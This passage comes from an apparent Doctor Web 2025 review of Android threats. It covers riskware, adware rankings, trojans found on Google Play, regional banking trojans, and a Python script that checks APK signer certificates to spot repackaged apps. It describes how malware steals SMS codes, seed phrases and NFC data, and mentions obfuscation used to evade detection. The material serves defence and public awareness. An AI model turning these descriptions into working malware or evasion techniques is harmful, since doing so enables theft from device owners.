    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A tool that allows apps installed on Android devices to be modified (by creating patches for them) in order to change how they work or to bypass certain restrictions. For instance, users can apply it to disable root-access checks in banking software or to obtain unlimited resources in games. To add patches, the utility downloads specially prepared scripts from the Internet; any third party can craft such scripts and add them to the shared database. The functionality of such scripts can prove to be malicious, so patches made with this tool can pose a potential threat.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A riskware platform that allows applications to launch APK files without installing them. It creates a virtual runtime environment inside the apps into which it is integrated. APK files launched through this platform operate as if they were part of those host apps and obtain the same permissions.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A packer tool designed to protect Android applications from unauthorized modification and reverse engineering. This tool is not malicious in itself, but it can be used to protect both harmless and malicious software.&lt;/dd&gt;
&lt;/dl&gt;
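&lt;p&gt;The signature-bypass point above deserves a practical check. Whatever NP Manager does to an app’s own runtime signature checks, the repackaged APK still has to be signed with a key the modder controls, so its signer certificate cannot match the original publisher’s. The Python script below is an added example and not Doctor Web’s code: it reads the APK Signing Block that Android stores immediately before the zip central directory, lists the signature schemes present (the block IDs for v2, v3, v3.1 and verity padding are those defined in the AOSP apksigner source) and returns the SHA-256 fingerprint of the first v2 signer certificate for comparison with the publisher’s known fingerprint. The input used here is a constructed minimal zip with a synthetic v2 block; a real APK is read as bytes in the same way. The script does not verify the signatures themselves and does not parse v3 signer data, whose layout differs from v2.&lt;/p&gt;

```python
import hashlib
import io
import zipfile

SIG_BLOCK_MAGIC = b"APK Sig Block 42"
V2_BLOCK_ID = 0x7109871A
# IDs of the ID-value pairs inside the block, as defined in AOSP apksigner
BLOCK_IDS = {V2_BLOCK_ID: "v2", 0xF05368C0: "v3", 0x1B93AD61: "v3.1", 0x42726577: "verity-padding"}


def _uint(buf: bytes, pos: int, width: int) -> int:
    return int.from_bytes(buf[pos:pos + width], "little")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _eocd_offset(data: bytes) -> int:
    # End of Central Directory record; any zip comment after it is at most 64 KiB
    idx = data.rfind(b"PK\x05\x06")
    if idx == -1:
        raise ValueError("not a zip file: no EOCD record")
    return idx


def _cd_offset(data: bytes) -> int:
    # start of the central directory: the uint32 at EOCD+16
    return _uint(data, _eocd_offset(data) + 16, 4)


def _lp(buf: bytes, pos: int):
    # uint32 length-prefixed field, the encoding used throughout the signing block
    n = _uint(buf, pos, 4)
    return buf[pos + 4:pos + 4 + n], pos + 4 + n


def parse_signing_block(apk: bytes) -> dict:
    """{block_id: value} for each ID-value pair, or {} when there is no
    APK Signing Block at all (v1/JAR-only signing, or an unsigned zip)."""
    cd = _cd_offset(apk)
    if 24 > cd or apk[cd - 16:cd] != SIG_BLOCK_MAGIC:
        return {}
    size = _uint(apk, cd - 24, 8)       # size_of_block excludes the leading uint64
    start = cd - size - 8
    if 0 > start or _uint(apk, start, 8) != size:
        raise ValueError("corrupt APK Signing Block: size fields disagree")
    pos, end, blocks = start + 8, cd - 24, {}
    while end > pos:
        pair_len = _uint(apk, pos, 8)   # length of uint32 id plus value
        blocks[_uint(apk, pos + 8, 4)] = apk[pos + 12:pos + 8 + pair_len]
        pos += 8 + pair_len
    return blocks


def first_signer_cert(v2_block: bytes) -> bytes:
    # v2 block: seq of signers, signer, signed data, then (digests, certificates, ...)
    signers, _ = _lp(v2_block, 0)
    signer, _ = _lp(signers, 0)
    signed_data, _ = _lp(signer, 0)
    _digests, pos = _lp(signed_data, 0)
    certs, _ = _lp(signed_data, pos)
    cert, _ = _lp(certs, 0)             # first X.509 certificate, DER-encoded
    return cert


def signer_fingerprint(apk: bytes):
    """(sorted scheme names present, SHA-256 hex of the first v2 signer cert or None)."""
    blocks = parse_signing_block(apk)
    schemes = sorted(BLOCK_IDS.get(i, hex(i)) for i in blocks)
    v2 = blocks.get(V2_BLOCK_ID)
    return schemes, (sha256_hex(first_signer_cert(v2)) if v2 else None)


# Constructed input for offline use: a minimal zip, optionally with a synthetic v2 block.
def _lpb(b: bytes) -> bytes:
    return len(b).to_bytes(4, "little") + b


def build_unsigned_zip() -> bytes:
    bio = io.BytesIO()
    with zipfile.ZipFile(bio, "w") as z:
        z.writestr("AndroidManifest.xml", b"placeholder manifest")
        z.writestr("classes.dex", b"dex\n035\x00placeholder")
    return bio.getvalue()


def build_v2_signed_zip(cert_der: bytes) -> bytes:
    data = build_unsigned_zip()
    cd = _cd_offset(data)
    signed_data = _lpb(b"") + _lpb(_lpb(cert_der)) + _lpb(b"")  # digests, certs, attrs
    signer = _lpb(signed_data) + _lpb(b"") + _lpb(b"")           # + signatures, public key
    v2 = _lpb(_lpb(signer))
    pairs = (4 + len(v2)).to_bytes(8, "little") + V2_BLOCK_ID.to_bytes(4, "little") + v2
    size = len(pairs) + 8 + len(SIG_BLOCK_MAGIC)
    block = size.to_bytes(8, "little") + pairs + size.to_bytes(8, "little") + SIG_BLOCK_MAGIC
    out = bytearray(data[:cd] + block + data[cd:])
    eocd = _eocd_offset(out)
    out[eocd + 16:eocd + 20] = (cd + len(block)).to_bytes(4, "little")
    return bytes(out)
```

&lt;p&gt;On a real sample, compare the returned fingerprint with the one apksigner prints for the publisher’s store build (apksigner verify --print-certs app.apk); a mismatch means the build was re-signed and should be treated as repackaged regardless of what the app itself reports. An empty scheme list means the APK carries only a v1 (JAR) signature or none at all, which is itself a reason for suspicion on a current Android target.&lt;/p&gt;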

&lt;p&gt;&lt;b&gt;Adware&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Third-party WhatsApp messenger mods, detected as &lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;, topped the list of adware programs detected in 2025. Such modifications are given the functionality needed to open links while the messenger is in use; these links redirect users to advertised websites. Compared to 2024, &lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;’s share of all adware apps detected on protected devices decreased from 47.45% to 26.90%.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt; modules, which are embedded into Android apps and display notifications containing ads, ranked second, increasing their share from 14.76% to 26.19%. Third place, with 8.88%, was occupied by members of the &lt;b&gt;Adware.Basement&lt;/b&gt; family. Their share remained almost the same, compared to the previous year. Such programs can display ads that lead to malicious websites.&lt;/p&gt;

&lt;p&gt;Also prevalent were the adware families &lt;a href="https://vms.drweb.com/search/?q=Adware.Airpush&amp;lng=en"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; (up from 4.35% to 5.14%), &lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt; (from 3.29% to 6.21%), &lt;b&gt;Adware.Youmi&lt;/b&gt; (from 1.62% to 2.91%), &lt;a href="https://vms.drweb.com/search/?q=Adware.Leadbolt&amp;lng=en"&gt;&lt;b&gt;Adware.Leadbolt&lt;/b&gt;&lt;/a&gt; (from 2.26% to 2.41%) and &lt;b&gt;Adware.Jiubang&lt;/b&gt; (from 1.70% to 2.38%).&lt;/p&gt;

&lt;p&gt;The ten most widespread adware programs detected on protected Android devices in 2025:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/11_2025_adware_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/11_2025_adware_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for some modified versions (mods) of the &lt;i&gt;WhatsApp&lt;/i&gt; messenger into which specific code has been injected. While the messenger is in operation, this code loads target URLs as web content (via the Android WebView component). These addresses redirect to advertised sites, including online casino, bookmaker, and adult sites.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.39.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;These apps display unwanted ads that often lead to malicious and fraudulent websites. They share a common code base with &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; unwanted applications.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;An adware module that malicious actors embed into cloned versions of popular Android games and applications. Its incorporation is facilitated by a specialized net2share packer. Copies of software created this way are then distributed through various software catalogs. When installed on Android devices, such apps and games display obnoxious ads.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Airpush&amp;lng=en"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Adware modules that can be built into Android apps and display various ads. Depending on the modules’ version and modification, these can be notifications containing ads, pop-up windows or banners. Malicious actors often use these modules to distribute malware by offering their potential victims diverse software for installation. Moreover, such modules collect personal information and send it to a remote server.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Youmi&amp;lng=en"&gt;&lt;b&gt;Adware.Youmi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for an unwanted adware module that adds advertising shortcuts onto the Android OS home screen.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Jiubang.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Unwanted ad-displaying software for Android devices that displays a banner showing recommended programs when applications are being installed.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Inmobi&amp;lng=en"&gt;&lt;b&gt;Adware.Inmobi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for some versions of the Inmobi adware SDK. These are capable of making phone calls and adding event entries into an Android device’s calendar.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Threats on Google Play&lt;/h3&gt;

&lt;p&gt;In 2025, Doctor Web’s anti-virus laboratory discovered over 180 malicious, unwanted, and adware apps, which had been installed a combined total of at least 2,165,040 times. Among them were various modifications of the trojans &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4215&lt;/b&gt;, which concealed their presence on infected devices and displayed ads on top of the system interface and other programs. These trojans were distributed under the guise of image-editing tools, camera apps for taking photos and videos, and some other software.&lt;/p&gt;

&lt;div class="img img-two mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/12_Android.HiddenAds.4215_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/12_Android.HiddenAds.4215_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/13_Android.HiddenAds.4213_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/13_Android.HiddenAds.4213_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;The programs Time Shift Cam and Fusion Collage Editor were adware trojans from the &lt;b&gt;Android.HiddenAds&lt;/b&gt; family&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Cybercriminals distributed the cryptocurrency-stealing trojans &lt;a href="https://vms.drweb.com/search/?q=Android.CoinSteal&amp;lng=en"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.202&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.CoinSteal&amp;lng=en"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.203&lt;/b&gt;, and &lt;a href="https://vms.drweb.com/search/?q=Android.CoinSteal&amp;lng=en"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.206&lt;/b&gt;, disguising them as official software from the Dydx crypto exchange and from the blockchain platforms Raydium and Aerodrome Finance.&lt;/p&gt;

&lt;div class="img img-two mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/14_Android.CoinSteal.203_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/14_Android.CoinSteal.203_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/15_Android.CoinSteal.202_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/15_Android.CoinSteal.202_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;The programs Raydium and Dydx Exchange were, in fact, trojans for stealing cryptocurrency&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;These malicious apps asked users to enter a mnemonic phrase—supposedly for connecting to a crypto wallet. But the information provided was actually sent to the attackers. To further confuse potential victims, the forms for entering mnemonic phrases could be disguised as requests from other crypto platforms.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/16_seed_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/16_seed_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/17_seed_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/17_seed_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.CoinSteal.206&lt;/b&gt; displays a phishing form, supposedly from the crypto exchange PancakeSwap, that asks users to enter the mnemonic phrase for accessing their crypto wallet&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Throughout the year, our specialists uncovered over 80 malicious &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; programs that subscribe users to paid services. They were disguised as various software, including messengers, photography apps, system tools, image-editing programs, and apps for working with documents.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/18_Android.Joker.2494_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/18_Android.Joker.2494_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/19_Android.Joker.2496_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/19_Android.Joker.2496_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Examples of the discovered &lt;b&gt;Android.Joker&lt;/b&gt; trojans. &lt;b&gt;Android.Joker.2494&lt;/b&gt; was distributed as the messenger File Text Messages, and &lt;b&gt;Android.Joker.2496&lt;/b&gt;–as the utility Useful Cleaner for optimizing a smartphone’s operation&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Cybercriminals again distributed all sorts of &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fake programs, using them in a number of fraudulent schemes. The programs’ main task is to load target websites. Threat actors passed off some of these trojans as finance-related software. Such apps loaded phishing websites as well as fraudulent sites that were supposedly related to investments and online earnings. Other fake apps from this family were distributed as games and, under certain conditions, could load online casino and bookmaker websites. We discovered over 100 such programs on Google Play.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/20_Android.FakeApp.1840_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/20_Android.FakeApp.1840_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/21_Android.FakeApp.1863_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/21_Android.FakeApp.1863_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Examples of &lt;b&gt;Android.FakeApp&lt;/b&gt; fake programs. The trojan &lt;b&gt;Android.FakeApp.1863&lt;/b&gt; was hidden in the TPAO app and targeted Turkish users, offering them the opportunity to manage deposits and income. The trojan &lt;b&gt;Android.FakeApp.1840&lt;/b&gt; was distributed as the game Pino Bounce and could load an online casino site&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Doctor Web’s virus analysts also discovered new adware. Dubbed &lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21912&lt;/b&gt;, this program was hidden in the Coin News Promax app, which offers information about cryptocurrencies. &lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21912&lt;/b&gt; displays notifications which, when clicked, load in a WebView the link specified by the C2 server.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/22_Adware.Adpush.21912_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/22_Adware.Adpush.21912_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;The Coin News Promax app from Google Play was the adware program &lt;b&gt;Adware.Adpush.21912&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In addition, our specialists found &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;, an unwanted app distributed as a program called &lt;i&gt;Zeus Jackpot Mania&lt;/i&gt;. In this app, users earned virtual rewards in a game-like fashion that allegedly could be converted into real money and withdrawn from the program.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/23_Program.FakeMoney.16_1_Zeus Jackpot Mania_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/23_Program.FakeMoney.16_1_Zeus Jackpot Mania_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;The Zeus Jackpot Mania app was the unwanted software &lt;b&gt;Program.FakeMoney.16&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;To “withdraw” the money, users were asked to submit some information to the program, but they did not receive any payouts.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/24_Program.FakeMoney.16_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/24_Program.FakeMoney.16_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Program.FakeMoney.16&lt;/b&gt; asks the user to provide their full name and information about their bank account&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Banking trojans&lt;/h3&gt;

&lt;p&gt;According to the detection statistics provided by Dr.Web Security Space for mobile devices, in 2025, the share of banking trojans, out of the total number of malicious apps registered, was 6.94%, which is slightly more than the 6.29% figure from the year before. During the first three months, banking trojan activity remained at approximately the same level, but at the beginning of the second quarter, it significantly increased. After that, it began to gradually decline, reaching the annual minimum in July. From August onwards, the number of detections began to grow again, peaking in October. At the end of the year, another decline was observed.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/26_banker_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/26_banker_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;In 2025, threat actors continued using a number of popular banking trojan families to carry out their attacks. Among the most active were the malicious apps &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot.Coper&amp;lng=en" target="_blank"&gt;Coper&lt;/a&gt;, &lt;b&gt;Android.BankBot.Ermac&lt;/b&gt;, and some others. Moreover, new versions of &lt;a href="https://vms.drweb.com/virus/?i=29204494&amp;lng=en" target="_blank"&gt;NGate&lt;/a&gt; trojans were found. These trojans use NFC technology to steal money. They send data from the NFC chip of infected devices to the attackers, allowing fraudsters to withdraw money from victims’ accounts at ATMs or make purchases using contactless payment without further user involvement. Among the most active were modifications like &lt;b&gt;Android.Banker.NGate.8&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.17&lt;/b&gt;, and &lt;b&gt;Android.Banker.NGate.5.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;&lt;b&gt;Android.SpyMax&lt;/b&gt;, malicious apps with spyware functionality, continued to be distributed. These trojans are based on leaked source code of the SpyNote RAT trojan. Cybercriminals use them in a variety of scenarios, including as banking trojans. At the same time, compared to 2024, the activity of &lt;b&gt;Android.SpyMax&lt;/b&gt; malware decreased. These trojans accounted for 12.35% of banking trojan detections, compared to 32.04% the year before.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/27_Android.SpyMax_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/27_Android.SpyMax_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;In 2025, Russian users were most likely to encounter various banking trojans belonging to the extensive Mamont family, as classified by Doctor Web (e.g., &lt;b&gt;Android.Banker.790.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.Mamont.3.origin&lt;/b&gt;, and &lt;b&gt;Android.Banker.Mamont.28.origin&lt;/b&gt;). This family includes different malicious apps that malware creators continue to actively modify and develop. These apps intercept SMS containing one-time codes from credit organizations and steal bank card data and other confidential information.&lt;/p&gt;

&lt;p&gt;Throughout the year, our experts observed the activity of banking trojans targeting users from Uzbekistan and neighboring countries, including Armenia, Azerbaijan, and Kyrgyzstan. Trojans like &lt;b&gt;Android.Banker.951.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.881.origin&lt;/b&gt;, and &lt;b&gt;Android.Banker.963.origin&lt;/b&gt; were most frequently detected on protected devices. They hijack verification codes from SMS coming from banks. Cybercriminals constantly modify such trojans to make it harder for them to be detected. Turkish users were most often attacked by the &lt;b&gt;Android.BankBot.Coper.12.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.5685&lt;/b&gt;, and &lt;b&gt;Android.Banker.864.origin&lt;/b&gt; banking trojans, which are also capable of stealing the contents of SMS.&lt;/p&gt;

&lt;p&gt;At the same time, Iranian residents encountered the trojans &lt;b&gt;Android.BankBot.1190.origin&lt;/b&gt; and &lt;b&gt;Android.BankBot.1191.origin&lt;/b&gt; and modifications of them. These malicious programs steal banking information from SMS, finding data about the victim’s bank cards, accounts, available funds, completed transactions, etc., and then send it to the attackers. They also collect contact information from the phone book and can send SMS on the attackers’ command.&lt;/p&gt;

&lt;p&gt;Users from many countries in Southeast Asia and the Asia-Pacific region, including Indonesia and South Korea, were attacked by the &lt;b&gt;Android.BankBot.Remo.1.origin&lt;/b&gt; trojan. This malicious program utilizes the Accessibility Services of the Android OS to steal data from bank software and crypto wallets installed on infected devices. In addition to the Remo trojan, users in South Korea also encountered such trojans as &lt;b&gt;Android.BankBot.15140&lt;/b&gt;, &lt;b&gt;Android.BankBot.Ermac.6.origin&lt;/b&gt;, and GoldDigger (&lt;b&gt;Android.BankBot.GoldDigger.9&lt;/b&gt;, &lt;b&gt;Android.BankBot.GoldDigger.11&lt;/b&gt;).&lt;/p&gt;

&lt;p&gt;The GoldDigger malware was also used to attack Indonesian and Thai users, while the banking trojan &lt;b&gt;Android.BankBot.Gigabud.1.origin&lt;/b&gt; was used against customers of credit organizations in Indonesia and Malaysia. At the same time, threat actors continued to use MoqHao trojans in attacks on Japanese audiences. The most widely used MoqHao modifications included &lt;b&gt;Android.Banker.672.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.5063&lt;/b&gt;, &lt;b&gt;Android.Banker.740.origin&lt;/b&gt;, and a number of others.&lt;/p&gt;

&lt;p&gt;One banking trojan targeting users in India was &lt;b&gt;Android.Banker.6209&lt;/b&gt;. This trojan imitates the appearance of genuine banking software to steal victims’ data, including their names, bank card numbers and CVV security codes. In addition, RewardSteal banking trojans, such as &lt;b&gt;Android.Banker.814.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.913.origin&lt;/b&gt;, and &lt;b&gt;Android.Banker.5132&lt;/b&gt;, continued to be active. To steal banking data, they are camouflaged as software that appears to be backed by large Indian credit organizations, for example, ICICI, SBI, Axis, and PM Kisan.&lt;/p&gt;

&lt;p&gt;Android device owners in Brazil were most frequently attacked by &lt;b&gt;Android.BankBot.1183.origin&lt;/b&gt; malicious apps and some members of the NGate family, like &lt;b&gt;Android.Banker.NGate.8&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.9&lt;/b&gt;, and &lt;b&gt;Android.Banker.NGate.14&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;In 2025, malware creators continued utilizing different techniques to protect Android banking trojans from analysis and detection. For instance, various code obfuscation and concealment methods were popular, such as DEX to C (which involves converting executable DEX code into C programming language code). Another widespread solution that was employed involved obfuscating malicious apps with the NP Manager utility.&lt;/p&gt;

